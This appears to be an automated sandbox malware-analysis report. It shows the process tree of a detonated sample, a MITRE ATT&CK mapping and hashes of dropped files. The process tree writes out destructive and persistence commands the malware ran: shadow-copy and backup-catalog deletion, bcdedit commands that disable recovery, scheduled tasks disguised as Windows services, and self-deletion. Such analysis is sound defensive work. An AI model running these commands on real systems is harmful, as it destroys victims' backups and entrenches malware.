                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4836
                                                                                                                                                                                                        • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                          vssadmin delete shadows /all /quiet
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                          PID:8900
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                        PID:4772
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                        PID:8640
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:9896
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5332
                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                              wmic shadowcopy delete
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:9840
                                                                                                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                            notepad.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1332
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\377C.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\377C.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:9336
                                                                                                                                                                                                              • C:\Users\Admin\Documents\Update.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\Update.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:5864
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Clip_.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:8728
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:7572
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:8012
                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                            PID:10136
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:9524
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:10048
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:1376
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:2996
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:9828
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:4508
                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                      PID:7776
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\VideoDriver.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\VideoDriver.exe"
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:9432
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:5176
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:5372
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:9480
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                        PID:9304
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Red1_.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                        PID:8724
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\377C.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\377C.exe"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:5752
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:4268
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                            ping 1.1.1.1 -n 1 -w 100
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                            PID:10100
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                            ping 1.1.1.1 -n 1 -w 900
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                            PID:9504
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:9868
                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:4784
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:4200
                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                              PID:7676
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:2104
                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                PID:6356
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:9040
                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                  PID:7852
                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                  PID:10104
                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                    MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                    PID:9572
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:6716
                                                                                                                                                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                    PID:5864
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                    PID:3180
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                    PID:5904
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                    PID:2352
                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                    PID:7784
                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:9580
                                                                                                                                                                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:8564
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                        PID:9608
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        PID:9768
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        PID:9520
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        PID:8480
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:1052

                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                                                        File Deletion

                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        T1107

                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1130

                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                        Software Discovery

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1518

                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1018

                                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                        Impact

                                                                                                                                                                                                                                                        Inhibit System Recovery

                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        T1490

                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          ce11de1000560d312bf6ab0b5327e87b

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          557f3f780cb0f694887ada330a87ba976cdb168f

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          126daa976d1eaec1bd68eb53748caa325fc537f865051dd0d5f09d599175861a

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          655b45bcf75a79c174caf6fae84560980511d068f67a89883f70b264e88983f729c604b3484fdcb8d8f8a83105e43d740fe70e7a006806136bc423453d769655

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          ce11de1000560d312bf6ab0b5327e87b

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          557f3f780cb0f694887ada330a87ba976cdb168f

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          126daa976d1eaec1bd68eb53748caa325fc537f865051dd0d5f09d599175861a

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          655b45bcf75a79c174caf6fae84560980511d068f67a89883f70b264e88983f729c604b3484fdcb8d8f8a83105e43d740fe70e7a006806136bc423453d769655

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          1c494825e5979add62914cfd05ce1821

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          b9070a59fc9dfcf6fc9bda98bda26b780e364d3d

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          d5a41fff5b0a0b3a0b02d046be48f3e254ecf9bcb9ba265aad29d57188596768

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          750b2ffc1ce7ecb108f2f48aea9581250816360aa94691f758e15af20e518f727dc77ae94b3703752f6657ad9f82ca55e5140518dbcb84c00f29830482762f77

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          fbdb8dd095a21a9414ae7baac69739cc

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          abae79a284d5074eea04c9bf370ebb37ad25abdc

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          3238709b2d19479dd1507661db52d7f47577fef643368956ad1e7c0f5f73e9ee

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          ba643b9b6964e4f4e1ee741652684d247241ea8315d6b57313ccc6c30220e392a8576f11c5f7306fa50c7b962601f7c2ef7c21f15c2c9486033f6108fc049ffd

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\j88HxV4UXDWOPXhwPUiI12WW.exe.log
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-9DR10.tmp\Wr0qtdKR68nAMIsvlNReNhUZ.tmp
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          ffcf263a020aa7794015af0edee5df0b

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          bce1eb5f0efb2c83f416b1782ea07c776666fdab

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\4lVrwSQJPodX2rnYzLcsEb21.exe
                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          bbfa73f5dc7f0d888a0d731842789bc6

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          4296b8152197dc85cccfe4398b78f53716db9c45

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          98c781b3fd15d6c7c7624aa1a0c93910dd5d19722a1d9b8cb1c7b9673d311090

                                                                                                                                                                                                                                                          SHA512

